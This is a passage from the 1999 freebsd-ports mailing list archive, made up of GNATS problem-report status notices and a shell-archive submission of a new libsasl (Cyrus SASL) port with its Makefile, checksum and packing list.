freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F267814E14; Thu, 23 Dec 1999 13:12:42 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA20291; Thu, 23 Dec 1999 13:12:42 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 13:12:42 -0800 (PST) From: Message-Id: <199912232112.NAA20291@freefall.freebsd.org> To: ust@cert.siemens.de, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15623: Build fails in ports/editors/staroffice5 with USE_CDROM Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Build fails in ports/editors/staroffice5 with USE_CDROM State-Changed-From-To: closed->open State-Changed-By: steve State-Changed-When: Thu Dec 23 13:11:59 PST 1999 State-Changed-Why: Seems jedgar and I had the same idea, but one of these needs to remain open until the problem is fixed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 13:15: 0 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C8A8215746; Thu, 23 Dec 1999 13:14:58 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA20654; Thu, 23 Dec 1999 13:14:53 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 13:14:53 -0800 (PST) From: Message-Id: <199912232114.NAA20654@freefall.freebsd.org> To: ust@cert.siemens.de, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15623: Build fails in ports/editors/staroffice5 with USE_CDROM Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Build fails in ports/editors/staroffice5 with USE_CDROM State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 13:12:53 PST 1999 State-Changed-Why: Oh, alright. I just committed this fix. So we'll close this PR one more time. This time for real. :) Sorry should have just done this the first time. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 13:40:37 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1651615831; Thu, 23 Dec 1999 13:40:35 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA22269; Thu, 23 Dec 1999 13:40:34 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 13:40:34 -0800 (PST) From: Message-Id: <199912232140.NAA22269@freefall.freebsd.org> To: andy@icc.surw.chel.su, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/13267: New port: glasteroids-1.0 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: glasteroids-1.0 State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 13:38:53 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 13:50:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 156D015713 for ; Thu, 23 Dec 1999 13:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA23516; Thu, 23 Dec 1999 13:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id D13FF1500A for ; Thu, 23 Dec 1999 13:48:45 -0800 (PST) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id QAA60149; Thu, 23 Dec 1999 16:48:41 -0500 (EST) (envelope-from wollman) Message-Id: <199912232148.QAA60149@khavrinen.lcs.mit.edu> Date: Thu, 23 Dec 1999 16:48:41 -0500 (EST) From: Garrett Wollman Reply-To: wollman@khavrinen.lcs.mit.edu To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15659: new port: CMU libsasl Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15659 >Category: ports >Synopsis: new port: CMU libsasl >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 23 13:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Garrett Wollman >Release: FreeBSD 4.0-CURRENT i386 >Organization: MIT Laboratory for Computer Science >Environment: Irrelevant. >Description: Having gone to the effort of porting libsasl (aka cyrus-sasl) for my own purposes, I figured that I might as well share it with the community. >How-To-Repeat: $ locate sasl (note no output) $ >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # libsasl # libsasl/Makefile # libsasl/files # libsasl/files/md5 # libsasl/pkg # libsasl/pkg/COMMENT # libsasl/pkg/PLIST # libsasl/pkg/PLIST.add-krb5 # libsasl/pkg/PLIST.add-krb4 # libsasl/pkg/DESCR # echo c - libsasl mkdir -p libsasl > /dev/null 2>&1 echo x - libsasl/Makefile sed 's/^X//' >libsasl/Makefile << 'END-of-libsasl/Makefile' X# New ports collection makefile for: libsasl X# Version required: 1.5.13 X# Date created: December 23, 1999 X# Whom: wollman@FreeBSD.org X# X# $FreeBSD$ X# X XDISTNAME= cyrus-sasl-1.5.13 XPKGNAME= libsasl-1.5.13 XCATEGORIES= security net XMASTER_SITES= ftp://ftp.andrew.cmu.edu/pub/cyrus-mail/ X XMAINTAINER= ports@FreeBSD.org X XUSE_GMAKE= YES XUSE_LIBTOOL= YES X XCONFIGURE_ARGS+= --with-dbpath=${PREFIX}/etc/sasldb \ X --includedir=${PREFIX}/include/sasl \ X --with-plugindir=${PREFIX}/lib/sasl --enable-static X X.if defined(KRB5_HOME) && exists(${KRB5_HOME}) XCONFIGURE_ARGS+= --enable-gssapi=${KRB5_HOME} X.endif X XMAN8= saslpasswd.8 XMAN1= sasl_client.1 sasl_server.1 X X.if !defined(NOPORTDOCS) XDOCFILES= draft-leach-digest-sasl-03.txt \ X draft-newman-auth-scram-03.txt \ X draft-newman-sasl-anon-00.txt \ X programming.html rfc1321.txt rfc2104.txt rfc2222.txt \ X sysadmin.html X Xpost-install:: X @${MKDIR} ${PREFIX}/share/doc/sasl X @for d in ${DOCFILES}; do \ X ${INSTALL_DATA} ${WRKSRC}/doc/$$d ${PREFIX}/share/doc/sasl; \ X echo share/doc/sasl/$$d >>${TMPPLIST}; \ X done X @echo '@dirrm share/doc/sasl' >>${TMPPLIST} X.endif X X.if defined(KRB5_HOME) && exists(${KRB5_HOME}) Xpost-install:: X @cat ${PKGDIR}/PLIST.add-krb5 >>${TMPPLIST} X.endif X X.if defined(MAKE_EBONES) && exists(/usr/lib/libkrb.a) Xpost-install:: X @cat ${PKGDIR}/PLIST.add-krb4 >>${TMPPLIST} X.endif X Xpost-install:: X @echo '@dirrm lib/sasl' >>${TMPPLIST} X X.include END-of-libsasl/Makefile echo c - libsasl/files mkdir -p libsasl/files > /dev/null 2>&1 echo x - libsasl/files/md5 sed 's/^X//' >libsasl/files/md5 << 'END-of-libsasl/files/md5' XMD5 (cyrus-sasl-1.5.13.tar.gz) = 6bfa1ac9f34d30e36cc827667f657521 END-of-libsasl/files/md5 echo c - libsasl/pkg mkdir -p libsasl/pkg > /dev/null 2>&1 echo x - libsasl/pkg/COMMENT sed 's/^X//' >libsasl/pkg/COMMENT << 'END-of-libsasl/pkg/COMMENT' XImplements the Simple Authentication and Security LayerEND-of-libsasl/pkg/COMMENT echo x - libsasl/pkg/PLIST sed 's/^X//' >libsasl/pkg/PLIST << 'END-of-libsasl/pkg/PLIST' Xinclude/sasl/hmac-md5.h Xinclude/sasl/md5.h Xinclude/sasl/md5global.h Xinclude/sasl/sasl.h Xinclude/sasl/saslplug.h Xinclude/sasl/saslutil.h X@dirrm include/sasl Xlib/libsasl.so.7 Xlib/libsasl.so Xlib/libsasl.a Xlib/sasl/libcrammd5.so.1 Xlib/sasl/libcrammd5.so Xlib/sasl/libcrammd5.a Xlib/sasl/libdigestmd5.so.0 Xlib/sasl/libdigestmd5.so Xlib/sasl/libdigestmd5.a Xlib/sasl/libanonymous.so.1 Xlib/sasl/libanonymous.so Xlib/sasl/libanonymous.a Xlib/sasl/libplain.so.1 Xlib/sasl/libplain.so Xlib/sasl/libplain.a Xsbin/saslpasswd END-of-libsasl/pkg/PLIST echo x - libsasl/pkg/PLIST.add-krb5 sed 's/^X//' >libsasl/pkg/PLIST.add-krb5 << 'END-of-libsasl/pkg/PLIST.add-krb5' Xlib/sasl/libgssapiv2.so.1 Xlib/sasl/libgssapiv2.so Xlib/sasl/libgssapiv2.a END-of-libsasl/pkg/PLIST.add-krb5 echo x - libsasl/pkg/PLIST.add-krb4 sed 's/^X//' >libsasl/pkg/PLIST.add-krb4 << 'END-of-libsasl/pkg/PLIST.add-krb4' Xlib/sasl/libkerberos4.so.1 Xlib/sasl/libkerberos4.so Xlib/sasl/libkerberos4.a END-of-libsasl/pkg/PLIST.add-krb4 echo x - libsasl/pkg/DESCR sed 's/^X//' >libsasl/pkg/DESCR << 'END-of-libsasl/pkg/DESCR' XDerived from: $Id: README,v 1.21 1999/12/02 20:10:30 leg Exp $ X XThis is the Cyrus SASL API implentation. It can be used on the client Xor server side to provide authentication. See RFC 2222 for more Xinformation. X XThe latest version is available at: Xftp://ftp.andrew.cmu.edu/pub/cyrus-mail X XThere's a mailing list for Cyrus SASL. Subscribe by sending a message Xto majordomo@lists.andrew.cmu.edu with the body "subscribe cyrus-sasl". X XFEATURES X-------- XThe following mechanisms are included in this distribution: XANONYMOUS XCRAM-MD5 XDIGEST-MD5 XGSSAPI (MIT Kerberos 5 or Heimdal Kerberos 5) XKERBEROS_V4 XPLAIN X XThe library can use a Berkeley DB, gdbm or ndbm file on the server Xside to store per-user authentication secrets. The utility saslpasswd Xhas been included for adding authentication secrets to the file. X XPLAIN can either check /etc/passwd, Kerberos V4, use PAM, or the sasl Xsecrets database. By default PAM is used if PAM is found, then XKerberos, finally /etc/passwd (non-shadow). This is tweakable in the Xconfiguration file. Please see X"${PREFIX}/share/doc/sasl/sysadmin.html". X XThe sample directory contains two programs which provide a reference Xfor using the library, as well as making it easy to test a mechanism Xon the command line. See "${PREFIX}/share/doc/sasl/programming.html" Xfor more information. END-of-libsasl/pkg/DESCR exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 15:36:19 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 357B91506A; Thu, 23 Dec 1999 15:36:18 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA30105; Thu, 23 Dec 1999 15:36:18 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 15:36:18 -0800 (PST) From: Message-Id: <199912232336.PAA30105@freefall.freebsd.org> To: ortmann@sparc.isl.net, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/11963: should update the ocaml-tk module and install in ports Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: should update the ocaml-tk module and install in ports State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 15:36:03 PST 1999 State-Changed-Why: This port no longer exists. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 15:38: 1 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B40AB14D34; Thu, 23 Dec 1999 15:38:00 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA30314; Thu, 23 Dec 1999 15:38:00 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 15:38:00 -0800 (PST) From: Message-Id: <199912232338.PAA30314@freefall.freebsd.org> To: osa@freebsd.org.ru, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/12013: patch for 12012 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: patch for 12012 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 15:37:32 PST 1999 State-Changed-Why: The current port is version 19990906-pl02. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 15:42:25 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C41C814CBE; Thu, 23 Dec 1999 15:42:24 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA30932; Thu, 23 Dec 1999 15:42:24 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 15:42:24 -0800 (PST) From: Message-Id: <199912232342.PAA30932@freefall.freebsd.org> To: andy@icc.surw.chel.su, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/7485: New port: Xterminal-0.2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: New port: Xterminal-0.2 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 15:41:10 PST 1999 State-Changed-Why: Please resubmit according to the current porting guidelines. Thanks. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 15:47: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 98B9A1581D; Thu, 23 Dec 1999 15:47:05 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA31479; Thu, 23 Dec 1999 15:47:05 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 15:47:05 -0800 (PST) From: Message-Id: <199912232347.PAA31479@freefall.freebsd.org> To: tempest@ecst.csuchico.edu, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/12001: wmcdplay 1.0Beta1 05/09/1998 sometimes skips to next track in 1-track repeat Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: wmcdplay 1.0Beta1 05/09/1998 sometimes skips to next track in 1-track repeat State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 15:45:15 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 19:43:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5851F15779; Thu, 23 Dec 1999 19:43:12 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA58040; Thu, 23 Dec 1999 19:43:12 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 19:43:12 -0800 (PST) From: Message-Id: <199912240343.TAA58040@freefall.freebsd.org> To: andy@icc.surw.chel.su, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15621: Update port: editors/le Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: editors/le State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 19:41:06 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 19:48:28 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4B828157BE; Thu, 23 Dec 1999 19:48:21 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA58522; Thu, 23 Dec 1999 19:48:21 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 19:48:21 -0800 (PST) From: Message-Id: <199912240348.TAA58522@freefall.freebsd.org> To: pangolin@home.com, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15617: Update spin to 3.3.7, fixing unfetchable Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update spin to 3.3.7, fixing unfetchable State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 19:45:41 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 19:59:16 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DD6E9157FE; Thu, 23 Dec 1999 19:59:10 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA59494; Thu, 23 Dec 1999 19:59:10 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 19:59:10 -0800 (PST) From: Message-Id: <199912240359.TAA59494@freefall.freebsd.org> To: tkato@prontomail.ne.jp, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15537: Update port: x11/sxpc Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: x11/sxpc State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 19:57:09 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20: 9:12 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5CBB615731; Thu, 23 Dec 1999 20:09:01 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA60356; Thu, 23 Dec 1999 20:09:01 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:09:01 -0800 (PST) From: Message-Id: <199912240409.UAA60356@freefall.freebsd.org> To: keith@ml.tw.freebsd.org, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15655: Upgrade chinese/xcin25 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Upgrade chinese/xcin25 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:07:52 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20: 9:41 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 800FD157A3; Thu, 23 Dec 1999 20:09:33 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA60461; Thu, 23 Dec 1999 20:09:33 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 20:09:33 -0800 (PST) From: Message-Id: <199912240409.UAA60461@freefall.freebsd.org> To: saska@acc.umu.se, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15252: small fix to remove setuid proposal + master site addition Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: small fix to remove setuid proposal + master site addition State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 20:07:33 PST 1999 State-Changed-Why: Committed, thanks. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:10:40 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A8814157BB; Thu, 23 Dec 1999 20:10:31 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA60720; Thu, 23 Dec 1999 20:10:31 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:10:31 -0800 (PST) From: Message-Id: <199912240410.UAA60720@freefall.freebsd.org> To: keith@ml.tw.freebsd.org, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15653: Upgrade ports/chinese/bg5ps Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Upgrade ports/chinese/bg5ps State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:09:47 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:15:40 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8E9FB157F0; Thu, 23 Dec 1999 20:15:34 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA61545; Thu, 23 Dec 1999 20:15:34 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:15:34 -0800 (PST) From: Message-Id: <199912240415.UAA61545@freefall.freebsd.org> To: keith@ml.tw.freebsd.org, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15654: Upgrade chinese/libtabe Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Upgrade chinese/libtabe State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:14:27 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:15:56 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 8550F157CD; Thu, 23 Dec 1999 20:15:53 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA61615; Thu, 23 Dec 1999 20:15:53 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 20:15:53 -0800 (PST) From: Message-Id: <199912240415.UAA61615@freefall.freebsd.org> To: tkato@prontomail.ne.jp, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15588: Update port: x11/sxpc Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: x11/sxpc State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 20:13:12 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:16:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 87E381566D; Thu, 23 Dec 1999 20:16:20 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA61727; Thu, 23 Dec 1999 20:16:20 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:16:20 -0800 (PST) From: Message-Id: <199912240416.UAA61727@freefall.freebsd.org> To: scott@sabunix.rresearch.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15648: get rid of unneeded 'post-patch' in mail/nmh Makefile Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: get rid of unneeded 'post-patch' in mail/nmh Makefile State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:16:03 PST 1999 State-Changed-Why: Sheldon did this not too long ago. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:17:57 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3D7C11516C; Thu, 23 Dec 1999 20:17:56 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA61951; Thu, 23 Dec 1999 20:17:56 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:17:56 -0800 (PST) From: Message-Id: <199912240417.UAA61951@freefall.freebsd.org> To: vince@pele.WURLDLINK.NET, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15642: tund port build failure Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: tund port build failure State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 20:16:30 PST 1999 State-Changed-Why: Remove the openssl port and try again. The only way I was able to make this happen was to compile openssl as a USA_RESIDENT and then tund as a non-USA_RESIDENT. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:18:40 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C3E251557E; Thu, 23 Dec 1999 20:18:34 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA62138; Thu, 23 Dec 1999 20:18:34 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:18:34 -0800 (PST) From: Message-Id: <199912240418.UAA62138@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, green@FreeBSD.org Subject: Re: ports/14859: OpenSSH has no support for the login class capability database. Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: OpenSSH has no support for the login class capability database. Responsible-Changed-From-To: freebsd-ports->green Responsible-Changed-By: steve Responsible-Changed-When: Thu Dec 23 20:18:15 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 20:19: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9E30015731; Thu, 23 Dec 1999 20:19:03 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA62228; Thu, 23 Dec 1999 20:19:03 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 20:19:03 -0800 (PST) From: Message-Id: <199912240419.UAA62228@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, jfitz@FreeBSD.org Subject: Re: ports/15395: fix port: net/mrtg (BUILD/LIB_DEPEND problem) Sender: owner-freebsd-ports@FreeBSD.ORG 